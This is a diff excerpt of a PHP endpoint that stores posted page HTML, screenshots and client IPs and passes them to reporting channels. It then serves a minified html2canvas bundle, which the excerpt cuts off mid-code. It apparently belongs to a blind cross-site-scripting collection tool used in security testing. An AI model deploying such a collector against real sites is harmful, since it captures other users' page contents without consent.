    139  - $content = base64_decode( substr( $content, strlen('data:image/png;base64,') ) );
    140  - if( file_put_contents($path_abs,$content) !== false ) {
    141  - $url = $_SERVER['REQUEST_SCHEME'].'://'.$_SERVER['SERVER_NAME'].rtrim(dirname($_SERVER['SCRIPT_NAME']),'/').'/'.trim($path,'/').'/'.$file;
    142  - return $url;
    143  - } else {
    144  - return '';
    145  - }
    146  - }
    147  -}
    148  - 
    149  -if( isset($_POST['datas']) )
    150  -{
    151  - // handling datas
    152  - $input = file_get_contents('php://input');
    153  - $input = substr( $input, strpos($input,'=')+1 );
    154  - $t_datas = json_decode( $input, true );
    155  - $t_datas['client_ip'] = Reporting::getClientIp();
    156  - $id = $t_datas['id'] = md5( uniqid('', true) );
    157  - $date = $t_datas['date'] = date( 'Y-m-d H:i:s' );
    158  - 
    159  - if( isset($t_datas['document_html']) && strlen($t_datas['document_html']) ) {
    160  - $t_datas['document_save'] = Reporting::save_html( $_config['image_path'], $id, $t_datas['document_html'] );
    161  - $t_datas['document_html'] = substr( $t_datas['document_html'], 0, 5000 );
    162  - } else {
    163  - unset( $t_datas['document_html'] );
    164  - }
    165  - 
    166  - if( isset($t_datas['screenshot']) && strlen($t_datas['screenshot']) ) {
    167  - $t_datas['screenshot'] = Reporting::save_screenshot( $_config['image_path'], $id, $t_datas['screenshot'] );
    168  - } else {
    169  - unset( $t_datas['screenshot'] );
    170  - }
    171  - 
    172  - // reporting
    173  - foreach( $_config['report'] as $method=>$config ) {
    174  - $function = 'report_'.$method;
    175  - if( method_exists('Reporting',$function) && isset($config['enabled']) && $config['enabled'] ) {
    176  - Reporting::$function( $config, $t_datas );
    177  - }
    178  - }
    179  - 
    180  - exit();
    181  -}
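The reporting loop above dispatches to `report_<method>` by name for each enabled channel (`method_exists` plus a variable function call in PHP). A Python sketch of the same pattern, using an explicit registry instead of runtime name lookup; the `report_*` bodies and config values here are illustrative stubs, not the real channels:

```python
def report_file(config, data):
    # stub: a real channel would append to config['path']
    return 'file:' + config['path']

def report_slack(config, data):
    # stub: a real channel would POST to config['webhook_url']
    return 'slack:' + config['webhook_url']

CONFIG = {
    'file': {'enabled': True, 'path': 'xss.log'},
    'slack': {'enabled': False, 'webhook_url': ''},
}

REGISTRY = {'report_file': report_file, 'report_slack': report_slack}

def dispatch(config, data, registry):
    # call report_<method> for every channel flagged enabled
    fired = []
    for method, cfg in config.items():
        func = registry.get('report_' + method)
        if callable(func) and cfg.get('enabled'):
            fired.append(func(cfg, data))
    return fired

print(dispatch(CONFIG, {}, REGISTRY))  # ['file:xss.log']
```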
    182  - 
    183  -header('Content-Type: application/javascript');
    184  - 
    185  -?>
    186  - 
    187  -// https://github.com/niklasvh/html2canvas
    188  -!function(t,e,n){function r(t,e,n,r){return c(t,n,r,e).then(function(a){E("Document cloned");var c="["+Ee+"='true']";t.querySelector(c).removeAttribute(Ee);var h=a.contentWindow,u=h.document.querySelector(c),p=new de(h.document),l=new m(e,p),d=B(u),f="view"===e.type?Math.min(d.width,n):o(),g="view"===e.type?Math.min(d.height,r):s(),y=new xe(f,g,l,e),v=new P(u,y,p,l,e);return v.ready.then(function(){E("Finished rendering");var t="view"===e.type||u!==h.document.body&&u!==h.document.documentElement?i(y.canvas,d):y.canvas;return e.removeContainer&&(a.parentNode.removeChild(a),E("Cleaned up container")),t})})}function i(t,n){var r=e.createElement("canvas"),i=Math.min(t.width-1,Math.max(0,n.left)),o=Math.min(t.width,Math.max(1,n.left+n.width)),s=Math.min(t.height-1,Math.max(0,n.top)),a=Math.min(t.height,Math.max(1,n.top+n.height)),c=r.width=o-i,h=r.height=a-s;return E("Cropping canvas at:","left:",n.left,"top:",n.top,"width:",n.width,"height:",n.height),E("Resulting crop with width",c,"and height",h," with x",i,"and y",s),r.getContext("2d").drawImage(t,i,s,c,h,0,0,c,h),r}function o(){return Math.max(Math.max(e.body.scrollWidth,e.documentElement.scrollWidth),Math.max(e.body.offsetWidth,e.documentElement.offsetWidth),Math.max(e.body.clientWidth,e.documentElement.clientWidth))}function s(){return Math.max(Math.max(e.body.scrollHeight,e.documentElement.scrollHeight),Math.max(e.body.offsetHeight,e.documentElement.offsetHeight),Math.max(e.body.clientHeight,e.documentElement.clientHeight))}function a(){return"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"}function c(e,n,r,i){var o=e.documentElement.cloneNode(!0),s=e.createElement("iframe"); return s.style.visibility="hidden",s.style.position="absolute",s.style.left=s.style.top="-10000px",s.width=n,s.height=r,s.scrolling="no",e.body.appendChild(s),new Promise(function(e){var n=s.contentWindow.document;s.contentWindow.onload=s.onload=function(){e(s)},n.open(),n.write("<!DOCTYPE 
html>"),n.close(),n.replaceChild(h(n.adoptNode(o)),n.documentElement),"view"===i.type&&s.contentWindow.scrollTo(t.pageXOffset,t.pageYOffset)})}function h(t){return[].slice.call(t.childNodes,0).filter(u).forEach(function(e){"SCRIPT"===e.tagName?t.removeChild(e):h(e)}),t}function u(t){return t.nodeType===Node.ELEMENT_NODE}function p(t){if(this.src=t,E("DummyImageContainer for",t),!this.promise||!this.image){E("Initiating DummyImageContainer"),p.prototype.image=new Image;var e=this.image;p.prototype.promise=new Promise(function(t,n){e.onload=t,e.onerror=n,e.src=a(),e.complete===!0&&t(e)})}}function l(t,n){var r,i,o=e.createElement("div"),s=e.createElement("img"),c=e.createElement("span"),h="Hidden Text";o.style.visibility="hidden",o.style.fontFamily=t,o.style.fontSize=n,o.style.margin=0,o.style.padding=0,e.body.appendChild(o),s.src=a(),s.width=1,s.height=1,s.style.margin=0,s.style.padding=0,s.style.verticalAlign="baseline",c.style.fontFamily=t,c.style.fontSize=n,c.style.margin=0,c.style.padding=0,c.appendChild(e.createTextNode(h)),o.appendChild(c),o.appendChild(s),r=s.offsetTop-c.offsetTop+1,o.removeChild(c),o.appendChild(e.createTextNode(h)),o.style.lineHeight="normal",s.style.verticalAlign="super",i=s.offsetTop-o.offsetTop+1,e.body.removeChild(o),this.baseline=r,this.lineWidth=1,this.middle=i}function d(){this.data={}}function f(t){this.src=t.value,this.colorStops=[],this.type=null,this.x0=.5,this.y0=.5,this.x1=.5,this.y1=.5,this.promise=Promise.resolve(!0)}function g(t,e){this.src=t,this.image=new Image;var n=this;this.tainted=null,this.promise=new Promise(function(r,i){n.image.onload=r,n.image.onerror=i,e&&(n.image.crossOrigin="anonymous"),n.image.src=t,n.image.complete===!0&&r(n.image)})["catch"](function(){var e=new p(t);return e.promise.then(function(t){n.image=t})})}function m(e,n){this.link=null,this.options=e,this.support=n,this.origin=t.location.protocol+t.location.hostname+t.location.port}function y(t){return"IMG"===t.node.nodeName}function 
v(t){return"svg"===t.node.nodeName}function w(t){return{args:[t.node.src],method:"url"}}function b(t){return{args:[t.node],method:"svg"}}function x(t){f.apply(this,arguments),this.type=this.TYPES.LINEAR;var e=null===t.args[0].match(this.stepRegExp);e?t.args[0].split(" ").reverse().forEach(function(t){switch(t){case"left":this.x0=0,this.x1=1;break;case"top":this.y0=0,this.y1=1;break;case"right":this.x0=1,this.x1=0;break;case"bottom":this.y0=1,this.y1=0;break;case"to":var e=this.y0,n=this.x0;this.y0=this.y1,this.x0=this.x1,this.x1=n,this.y1=e;break;default:var r=t.match(this.angleRegExp);if(r)switch(r[2]){case"deg":var i=parseFloat(r[1]),o=i/(180/Math.PI),s=Math.tan(o);this.y0=2/Math.tan(s)/2,this.x0=0,this.x1=1,this.y1=0}}},this):(this.y0=0,this.y1=1),this.colorStops=t.args.slice(e?1:0).map(function(t){var e=t.match(this.stepRegExp);return{color:e[1],stop:"%"===e[3]?e[2]/100:null}},this),null===this.colorStops[0].stop&&(this.colorStops[0].stop=0),null===this.colorStops[this.colorStops.length-1].stop&&(this.colorStops[this.colorStops.length-1].stop=1),this.colorStops.forEach(function(t,e){null===t.stop&&this.colorStops.slice(e).some(function(n,r){return null!==n.stop?(t.stop=(n.stop-this.colorStops[e-1].stop)/(r+1)+this.colorStops[e-1].stop,!0):!1},this)},this)}function E(){t.html2canvas.logging&&t.console&&t.console.log&&Function.prototype.bind.call(t.console.log,t.console).apply(t.console,[Date.now()-t.html2canvas.start+"ms","html2canvas:"].concat([].slice.call(arguments,0)))}function T(t,e){this.node=t,this.parent=e,this.stack=null,this.bounds=null,this.offsetBounds=null,this.visible=null,this.computedStyles=null,this.styles={},this.backgroundImages=null,this.transformData=null,this.transformMatrix=null}function C(t){var e=t.options[t.selectedIndex||0];return e?e.text||"":""}function k(t){return t&&"matrix"===t[1]?t[2].split(",").map(function(t){return parseFloat(t.trim())}):void 0}function I(t){return-1!==t.toString().indexOf("%")}function S(t){var 
e,n,r,i,o,s,a,c=" \r\n ",h=[],u=0,p=0,l=function(){e&&('"'===n.substr(0,1)&&(n=n.substr(1,n.length-2)),n&&a.push(n),"-"===e.substr(0,1)&&(i=e.indexOf("-",1)+1)>0&&(r=e.substr(0,i),e=e.substr(i)),h.push({prefix:r,method:e.toLowerCase(),value:o,args:a,image:null})),a=[],e=r=n=o=""};return a=[],e=r=n=o="",t.split("").forEach(function(t){if(!(0===u&&c.indexOf(t)>-1)){switch(t){case'"':s?s===t&&(s=null):s=t;break;case"(":if(s)break;if(0===u)return u=1,void(o+=t);p++;break;case")":if(s)break;if(1===u){if(0===p)return u=0,o+=t,void l();p--}break;case",":if(s)break;if(0===u)return void l();if(1===u&&0===p&&!e.match(/^url$/i))return a.push(n),n="",void(o+=t)}o+=t,0===u?e+=t:n+=t}}),l(),h}function R(t){return t.replace("px","")}function O(t){return parseFloat(t)}function B(t){if(t.getBoundingClientRect){var e=t.getBoundingClientRect(),n="BODY"===t.nodeName,r=n?t.scrollWidth:null==t.offsetWidth?e.width:t.offsetWidth;return{top:e.top,bottom:e.bottom||e.top+e.height,right:e.left+r,left:e.left,width:r,height:n?t.scrollHeight:null==t.offsetHeight?e.height:t.offsetHeight}}return{}}function M(t){var e=t.offsetParent?M(t.offsetParent):{top:0,left:0};return{top:t.offsetTop+e.top,bottom:t.offsetTop+t.offsetHeight+e.top,right:t.offsetLeft+e.left+t.offsetWidth,left:t.offsetLeft+e.left,width:t.offsetWidth,height:t.offsetHeight}}function P(t,e,n,r,i){E("Starting NodeParser"),this.renderer=e,this.options=i,this.range=null,this.support=n,this.renderQueue=[],this.stack=new le(!0,1,t.ownerDocument,null);var o=new T(t,null);t!==t.ownerDocument.documentElement&&this.renderer.isTransparent(o.css("backgroundColor"))&&e.rectangle(0,0,e.width,e.height,new T(t.ownerDocument.documentElement,null).css("backgroundColor")),o.visibile=o.isElementVisible(),this.createPseudoHideStyles(t.ownerDocument),this.nodes=ce([o].concat(this.getChildren(o)).filter(function(t){return t.visible=t.isElementVisible()}).map(this.getPseudoElements,this)),this.fontMetrics=new d,E("Fetched 
nodes"),this.images=r.fetch(this.nodes.filter(te)),E("Creating stacking contexts"),this.createStackingContexts(),E("Sorting stacking contexts"),this.sortStackingContexts(this.stack),this.ready=this.images.ready.then(ie(function(){return E("Images loaded, starting parsing"),this.parse(this.stack),E("Render queue created with "+this.renderQueue.length+" items"),new Promise(ie(function(t){i.async?"function"==typeof i.async?i.async.call(this,this.renderQueue,t):(this.renderIndex=0,this.asyncRenderer(this.renderQueue,t)):(this.renderQueue.forEach(this.paint,this),t())},this))},this))}function A(t){return t.replace(/(\-[a-z])/g,function(t){return t.toUpperCase().replace("-","")})}function N(){}function L(t,e,n,r){var i=4*((Math.sqrt(2)-1)/3),o=n*i,s=r*i,a=t+n,c=e+r;return{topLeft:_({x:t,y:c},{x:t,y:c-s},{x:a-o,y:e},{x:a,y:e}),topRight:_({x:t,y:e},{x:t+o,y:e},{x:a,y:c-s},{x:a,y:c}),bottomRight:_({x:a,y:e},{x:a,y:e+s},{x:t+o,y:c},{x:t,y:c}),bottomLeft:_({x:a,y:c},{x:a-o,y:c},{x:t,y:e+s},{x:t,y:e})}}function D(t,e,n){var r=t.left,i=t.top,o=t.width,s=t.height,a=e[0][0],c=e[0][1],h=e[1][0],u=e[1][1],p=e[2][0],l=e[2][1],d=e[3][0],f=e[3][1],g=o-h,m=s-l,y=o-p,v=s-f;return{topLeftOuter:L(r,i,a,c).topLeft.subdivide(.5),topLeftInner:L(r+n[3].width,i+n[0].width,Math.max(0,a-n[3].width),Math.max(0,c-n[0].width)).topLeft.subdivide(.5),topRightOuter:L(r+g,i,h,u).topRight.subdivide(.5),topRightInner:L(r+Math.min(g,o+n[3].width),i+n[0].width,g>o+n[3].width?0:h-n[3].width,u-n[0].width).topRight.subdivide(.5),bottomRightOuter:L(r+y,i+m,p,l).bottomRight.subdivide(.5),bottomRightInner:L(r+Math.min(y,o+n[3].width),i+Math.min(m,s+n[0].width),Math.max(0,p-n[1].width),Math.max(0,l-n[2].width)).bottomRight.subdivide(.5),bottomLeftOuter:L(r,i+v,d,f).bottomLeft.subdivide(.5),bottomLeftInner:L(r+n[3].width,i+v,Math.max(0,d-n[3].width),Math.max(0,f-n[2].width)).bottomLeft.subdivide(.5)}}function _(t,e,n,r){var 
i=function(t,e,n){return{x:t.x+(e.x-t.x)*n,y:t.y+(e.y-t.y)*n}};return{start:t,startControl:e,endControl:n,end:r,subdivide:function(o){var s=i(t,e,o),a=i(e,n,o),c=i(n,r,o),h=i(s,a,o),u=i(a,c,o),p=i(h,u,o);return[_(t,s,h,p),_(p,u,c,r)]},curveTo:function(t){t.push(["bezierCurve",e.x,e.y,n.x,n.y,r.x,r.y])},curveToReversed:function(r){r.push(["bezierCurve",n.x,n.y,e.x,e.y,t.x,t.y])}}}function F(t,e,n,r,i,o,s){var a=[];return e[0]>0||e[1]>0?(a.push(["line",r[1].start.x,r[1].start.y]),r[1].curveTo(a)):a.push(["line",t.c1[0],t.c1[1]]),n[0]>0||n[1]>0?(a.push(["line",o[0].start.x,o[0].start.y]),o[0].curveTo(a),a.push(["line",s[0].end.x,s[0].end.y]),s[0].curveToReversed(a)):(a.push(["line",t.c2[0],t.c2[1]]),a.push(["line",t.c3[0],t.c3[1]])),e[0]>0||e[1]>0?(a.push(["line",i[1].end.x,i[1].end.y]),i[1].curveToReversed(a)):a.push(["line",t.c4[0],t.c4[1]]),a}function W(t,e,n,r,i,o,s){e[0]>0||e[1]>0?(t.push(["line",r[0].start.x,r[0].start.y]),r[0].curveTo(t),r[1].curveTo(t)):t.push(["line",o,s]),(n[0]>0||n[1]>0)&&t.push(["line",i[0].start.x,i[0].start.y])}function H(t){return t.cssInt("zIndex")<0}function j(t){return t.cssInt("zIndex")>0}function V(t){return 0===t.cssInt("zIndex")}function z(t){return-1!==["inline","inline-block","inline-table"].indexOf(t.css("display"))}function Y(t){return t instanceof le}function X(t){return t.node.data.trim().length>0}function G(t){return/^(normal|none|0px)$/.test(t.parent.css("letterSpacing"))}function U(t){return["TopLeft","TopRight","BottomRight","BottomLeft"].map(function(e){var n=t.css("border"+e+"Radius"),r=n.split(" ");return r.length<=1&&(r[1]=r[0]),r.map(oe)})}function Q(t){return t.nodeType===Node.TEXT_NODE||t.nodeType===Node.ELEMENT_NODE}function q(t){var e=t.css("position"),n="absolute"===e||"relative"===e?t.css("zIndex"):"auto";return"auto"!==n}function $(t){return"static"!==t.css("position")}function J(t){return"none"!==t.css("float")}function K(t){return-1!==["inline-block","inline-table"].indexOf(t.css("display"))}function 
Z(t){var e=this;return function(){return!t.apply(e,arguments)}}function te(t){return t.node.nodeType===Node.ELEMENT_NODE}function ee(t){return t.node.nodeType===Node.TEXT_NODE}function ne(t,e){return t.cssInt("zIndex")-e.cssInt("zIndex")}function re(t){return t.css("opacity")<1}function ie(t,e){return function(){return t.apply(e,arguments)}}function oe(t){return parseInt(t,10)}function se(t){return t.width}function ae(t){return t.node.nodeType!==Node.ELEMENT_NODE||-1===["SCRIPT","HEAD","TITLE","OBJECT","BR","OPTION"].indexOf(t.node.nodeName)}function ce(t){return[].concat.apply([],t)}function he(t){var e=t.substr(0,1);return e===t.substr(t.length-1)&&e.match(/'|"/)?t.substr(1,t.length-2):t}function ue(r,i){var o="html2canvas_"+Te++,s=e.createElement("script"),a=e.createElement("a");a.href=r,r=a.href;var c=i+(i.indexOf("?")>-1?"&":"?")+"url="+encodeURIComponent(r)+"&callback="+o;this.src=r,this.image=new Image;var h=this;this.promise=new Promise(function(r,i){h.image.onload=r,h.image.onerror=i,t[o]=function(e){"error:"===e.substring(0,6)?i():h.image.src=e,t[o]=n;try{delete t[o]}catch(r){}s.parentNode.removeChild(s)},s.setAttribute("type","text/javascript"),s.setAttribute("src",c),e.body.appendChild(s)})["catch"](function(){var t=new p(r);return t.promise.then(function(t){h.image=t})})}function pe(t,e,n,r){this.width=t,this.height=e,this.images=n,this.options=r}function le(t,e,n,r){T.call(this,n,r),this.ownStacking=t,this.contexts=[],this.children=[],this.opacity=(this.parent?this.parent.stack.opacity:1)*e}function de(t){this.rangeBounds=this.testRangeBounds(t),this.cors=this.testCORS(),this.svg=this.testSVG()}function fe(t){this.src=t,this.image=null;var e=this;this.promise=this.hasFabric().then(function(){return e.isInline(t)?Promise.resolve(e.inlineFormatting(t)):be(t)}).then(function(t){return new Promise(function(n){html2canvas.fabric.loadSVGFromString(t,e.createCanvas.call(e,n))})})}function ge(t){var 
e,n,r,i,o,s,a,c,h="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",u=t.length,p="";for(e=0;u>e;e+=4)n=h.indexOf(t[e]),r=h.indexOf(t[e+1]),i=h.indexOf(t[e+2]),o=h.indexOf(t[e+3]),s=n<<2|r>>4,a=(15&r)<<4|i>>2,c=(3&i)<<6|o,p+=64===i?String.fromCharCode(s):64===o||-1===o?String.fromCharCode(s,a):String.fromCharCode(s,a,c);return p}function me(t){this.src=t,this.image=null;var e=this;this.promise=this.hasFabric().then(function(){return new Promise(function(n){html2canvas.fabric.parseSVGDocument(t,e.createCanvas.call(e,n))})})}function ye(t,e){T.call(this,t,e)}function ve(t,e,n){return t.length>0?e+n.toUpperCase():void 0}function we(t){f.apply(this,arguments),this.type="linear"===t.args[0]?this.TYPES.LINEAR:this.TYPES.RADIAL}function be(t){return new Promise(function(e,n){var r=new XMLHttpRequest;r.open("GET",t),r.onload=function(){200===r.status?e(r.responseText):n(new Error(r.statusText))},r.onerror=function(){n(new Error("Network Error"))},r.send()})}function xe(t,n){pe.apply(this,arguments),this.canvas=e.createElement("canvas"),this.canvas.width=t,this.canvas.height=n,this.ctx=this.canvas.getContext("2d"),this.taintCtx=e.createElement("canvas").getContext("2d"),this.ctx.textBaseline="bottom",this.variables={},E("Initialized CanvasRenderer")}if(!function(){var n,r,i,o;!function(){var t={},e={};n=function(e,n,r){t[e]={deps:n,callback:r}},o=i=r=function(n){function i(t){if("."!==t.charAt(0))return t;for(var e=t.split("/"),r=n.split("/").slice(0,-1),i=0,o=e.length;o>i;i++){var s=e[i];if(".."===s)r.pop();else{if("."===s)continue;r.push(s)}}return r.join("/")}if(o._eak_seen=t,e[n])return e[n];if(e[n]={},!t[n])throw new Error("Could not find module "+n);for(var s,a=t[n],c=a.deps,h=a.callback,u=[],p=0,l=c.length;l>p;p++)u.push("exports"===c[p]?s={}:r(i(c[p])));var d=h.apply(this,u);return e[n]=s||d}}(),n("promise/all",["./utils","exports"],function(t,e){"use strict";function n(t){var e=this;if(!r(t))throw new TypeError("You must pass an array to 
all.");return new e(function(e,n){function r(t){return function(e){o(t,e)}}function o(t,n){a[t]=n,0===--c&&e(a)}var s,a=[],c=t.length;0===c&&e([]);for(var h=0;h<t.length;h++)s=t[h],s&&i(s.then)?s.then(r(h),n):o(h,s)})}var r=t.isArray,i=t.isFunction;e.all=n}),n("promise/asap",["exports"],function(n){"use strict";function r(){return function(){process.nextTick(s)}}function i(){var t=0,n=new u(s),r=e.createTextNode("");return n.observe(r,{characterData:!0}),function(){r.data=t=++t%2}}function o(){return function(){p.setTimeout(s,1)}}function s(){for(var t=0;t<l.length;t++){var e=l[t],n=e[0],r=e[1];n(r)}l=[]}function a(t,e){var n=l.push([t,e]);1===n&&c()}var c,h="undefined"!=typeof t?t:{},u=h.MutationObserver||h.WebKitMutationObserver,p="undefined"!=typeof global?global:this,l=[];c="undefined"!=typeof process&&"[object process]"==={}.toString.call(process)?r():u?i():o(),n.asap=a}),n("promise/cast",["exports"],function(t){"use strict";function e(t){if(t&&"object"==typeof t&&t.constructor===this)return t;var e=this;return new e(function(e){e(t)})}t.cast=e}),n("promise/config",["exports"],function(t){"use strict";function e(t,e){return 2!==arguments.length?n[t]:void(n[t]=e)}var n={instrument:!1};t.config=n,t.configure=e}),n("promise/polyfill",["./promise","./utils","exports"],function(e,n,r){"use strict";function i(){var e="Promise"in t&&"cast"in t.Promise&&"resolve"in t.Promise&&"reject"in t.Promise&&"all"in t.Promise&&"race"in t.Promise&&function(){var e;return new t.Promise(function(t){e=t}),s(e)}();e||(t.Promise=o)}var o=e.Promise,s=n.isFunction;r.polyfill=i}),n("promise/promise",["./config","./utils","./cast","./all","./race","./resolve","./reject","./asap","exports"],function(t,e,n,r,i,o,s,a,c){"use strict";function h(t){if(!E(t))throw new TypeError("You must pass a resolver function as the first argument to the promise constructor");if(!(this instanceof h))throw new TypeError("Failed to construct 'Promise': Please use the 'new' operator, this object constructor 
cannot be called as a function.");this._subscribers=[],u(t,this)}function u(t,e){function n(t){g(e,t)}function r(t){y(e,t)}try{t(n,r)}catch(i){r(i)}}function p(t,e,n,r){var i,o,s,a,c=E(n);if(c)try{i=n(r),s=!0}catch(h){a=!0,o=h}else i=r,s=!0;f(e,i)||(c&&s?g(e,i):a?y(e,o):t===M?g(e,i):t===P&&y(e,i))}function l(t,e,n,r){var i=t._subscribers,o=i.length;i[o]=e,i[o+M]=n,i[o+P]=r}function d(t,e){for(var n,r,i=t._subscribers,o=t._detail,s=0;s<i.length;s+=3)n=i[s],r=i[s+e],p(e,n,r,o);t._subscribers=null}function f(t,e){var n,r=null;try{if(t===e)throw new TypeError("A promises callback cannot return that same promise.");if(x(e)&&(r=e.then,E(r)))return r.call(e,function(r){return n?!0:(n=!0,void(e!==r?g(t,r):m(t,r)))},function(e){return n?!0:(n=!0,void y(t,e))}),!0}catch(i){return n?!0:(y(t,i),!0)}return!1}function g(t,e){t===e?m(t,e):f(t,e)||m(t,e)}function m(t,e){t._state===O&&(t._state=B,t._detail=e,b.async(v,t))}function y(t,e){t._state===O&&(t._state=B,t._detail=e,b.async(w,t))}function v(t){d(t,t._state=M)}function w(t){d(t,t._state=P)}var b=t.config,x=(t.configure,e.objectOrFunction),E=e.isFunction,T=(e.now,n.cast),C=r.all,k=i.race,I=o.resolve,S=s.reject,R=a.asap;b.async=R;var O=void 0,B=0,M=1,P=2;h.prototype={constructor:h,_state:void 0,_detail:void 0,_subscribers:void 0,then:function(t,e){var n=this,r=new this.constructor(function(){});if(this._state){var i=arguments;b.async(function(){p(n._state,r,i[n._state-1],n._detail)})}else l(this,r,t,e);return r},"catch":function(t){return this.then(null,t)}},h.all=C,h.cast=T,h.race=k,h.resolve=I,h.reject=S,c.Promise=h}),n("promise/race",["./utils","exports"],function(t,e){"use strict";function n(t){var e=this;if(!r(t))throw new TypeError("You must pass an array to race.");return new e(function(e,n){for(var r,i=0;i<t.length;i++)r=t[i],r&&"function"==typeof r.then?r.then(e,n):e(r)})}var r=t.isArray;e.race=n}),n("promise/reject",["exports"],function(t){"use strict";function e(t){var e=this;return new 
e(function(e,n){n(t)})}t.reject=e}),n("promise/resolve",["exports"],function(t){"use strict";function e(t){var e=this;return new e(function(e){e(t)})}t.resolve=e}),n("promise/utils",["exports"],function(t){"use strict";function e(t){return n(t)||"object"==typeof t&&null!==t}function n(t){return"function"==typeof t}function r(t){return"[object Array]"===Object.prototype.toString.call(t)}var i=Date.now||function(){return(new Date).getTime()};t.objectOrFunction=e,t.isFunction=n,t.isArray=r,t.now=i}),r("promise/polyfill").polyfill()}(),"function"!=typeof Object.create||"function"!=typeof e.createElement("canvas").getContext)return void(t.html2canvas=function(){return Promise.reject("No canvas support")});var Ee="data-html2canvas-node";t.html2canvas=function(i,o){o=o||{},o.logging&&(t.html2canvas.logging=!0,t.html2canvas.start=Date.now()),o.async="undefined"==typeof o.async?!0:o.async,o.allowTaint="undefined"==typeof o.allowTaint?!1:o.allowTaint,o.removeContainer="undefined"==typeof o.removeContainer?!0:o.removeContainer;var s=(i===n?[e.documentElement]:i.length?i:[i])[0];return s.setAttribute(Ee,"true"),r(s.ownerDocument,o,t.innerWidth,t.innerHeight).then(function(t){return"function"==typeof o.onrendered&&(E("options.onrendered is deprecated, html2canvas returns a Promise containing the canvas"),o.onrendered(t)),t})},d.prototype.getMetrics=function(t,e){return this.data[t+"-"+e]===n&&(this.data[t+"-"+e]=new l(t,e)),this.data[t+"-"+e]},f.prototype.TYPES={LINEAR:1,RADIAL:2},f.prototype.angleRegExp=/([+-]?\d*\.?\d+)(deg|grad|rad|turn)/,m.prototype.findImages=function(t){var e=[];return t.filter(y).map(w).forEach(this.addImage(e,this.loadImage),this),t.filter(v).map(b).forEach(this.addImage(e,this.loadImage),this),e},m.prototype.findBackgroundImage=function(t,e){return e.parseBackgroundImages().filter(this.hasImageBackground).forEach(this.addImage(t,this.loadImage),this),t},m.prototype.addImage=function(t,e){return 
function(n){n.args.forEach(function(r){this.imageExists(t,r)||(t.splice(0,0,e.call(this,n)),E("Added image #"+t.length,"string"==typeof r?r.substring(0,100):r))},this)}},m.prototype.hasImageBackground=function(t){return"none"!==t.method},m.prototype.loadImage=function(t){if("url"===t.method){var e=t.args[0];return!this.isSVG(e)||this.support.svg||this.options.allowTaint?e.match(/data:image\/.*;base64,/i)?new g(e.replace(/url\(['"]{0,}|['"]{0,}\)$/gi,""),!1):this.isSameOrigin(e)||this.options.allowTaint===!0||this.isSVG(e)?new g(e,!1):this.support.cors&&!this.options.allowTaint&&this.options.useCORS?new g(e,!0):this.options.proxy?new ue(e,this.options.proxy):new p(e):new fe(e)}return"linear-gradient"===t.method?new x(t):"gradient"===t.method?new we(t):"svg"===t.method?new me(t.args[0]):new p(t)},m.prototype.isSVG=function(t){return/(.+).svg$/i.test(t)||fe.prototype.isInline(t)},m.prototype.imageExists=function(t,e){return t.some(function(t){return t.src===e})},m.prototype.isSameOrigin=function(t){var n=this.link||(this.link=e.createElement("a"));n.href=t,n.href=n.href;var r=n.protocol+n.hostname+n.port;return r===this.origin},m.prototype.getPromise=function(t){return t.promise},m.prototype.get=function(t){var e=null;return this.images.some(function(n){return(e=n).src===t})?e:null},m.prototype.fetch=function(t){return this.images=t.reduce(ie(this.findBackgroundImage,this),this.findImages(t)),this.images.forEach(function(t,e){t.promise.then(function(){E("Succesfully loaded image #"+(e+1))},function(){E("Failed loading image #"+(e+1))})}),this.ready=Promise.all(this.images.map(this.getPromise)),E("Finished searching images"),this},x.prototype=Object.create(f.prototype),x.prototype.stepRegExp=/((?:rgb|rgba)\(\d{1,3},\s\d{1,3},\s\d{1,3}(?:,\s[0-9\.]+)?\))\s*(\d{1,3})?(%|px)?/,T.prototype.assignStack=function(t){this.stack=t,t.children.push(this)},T.prototype.isElementVisible=function(){return 
this.node.nodeType===Node.TEXT_NODE?this.parent.visible:"none"!==this.css("display")&&"hidden"!==this.css("visibility")&&!this.node.hasAttribute("data-html2canvas-ignore")},T.prototype.css=function(t){return this.computedStyles||(this.computedStyles=this.computedStyle(null)),this.styles[t]||(this.styles[t]=this.computedStyles[t])},T.prototype.prefixedCss=function(t){var e=["webkit","moz","ms","o"],r=this.css(t);return r===n&&e.some(function(e){return r=this.css(e+t.substr(0,1).toUpperCase()+t.substr(1)),r!==n},this),r===n?null:r},T.prototype.computedStyle=function(t){return this.node.ownerDocument.defaultView.getComputedStyle(this.node,t)},T.prototype.cssInt=function(t){var e=parseInt(this.css(t),10);return isNaN(e)?0:e},T.prototype.cssFloat=function(t){var e=parseFloat(this.css(t));return isNaN(e)?0:e},T.prototype.fontWeight=function(){var t=this.css("fontWeight");switch(parseInt(t,10)){case 401:t="bold";break;case 400:t="normal"}return t},T.prototype.parseBackgroundImages=function(){return this.backgroundImages||(this.backgroundImages=S(this.css("backgroundImage")))},T.prototype.cssList=function(t,e){var n=(this.css(t)||"").split(",");return n=n[e||0]||n[0]||"auto",n=n.trim().split(" "),1===n.length&&(n=[n[0],n[0]]),n},T.prototype.parseBackgroundSize=function(t,e,n){var r,i,o=this.cssList("backgroundSize",n);if(I(o[0]))r=t.width*parseFloat(o[0])/100;else{if(/contain|cover/.test(o[0])){var s=t.width/t.height,a=e.width/e.height;return a>s^"contain"===o[0]?{width:t.height*a,height:t.height}:{width:t.width,height:t.width/a}}r=parseInt(o[0],10)}return i="auto"===o[0]&&"auto"===o[1]?e.height:"auto"===o[1]?r/e.width*e.height:I(o[1])?t.height*parseFloat(o[1])/100:parseInt(o[1],10),"auto"===o[0]&&(r=i/e.height*e.width),{width:r,height:i}},T.prototype.parseBackgroundPosition=function(t,e,n,r){var i,o,s=this.cssList("backgroundPosition",n);return 
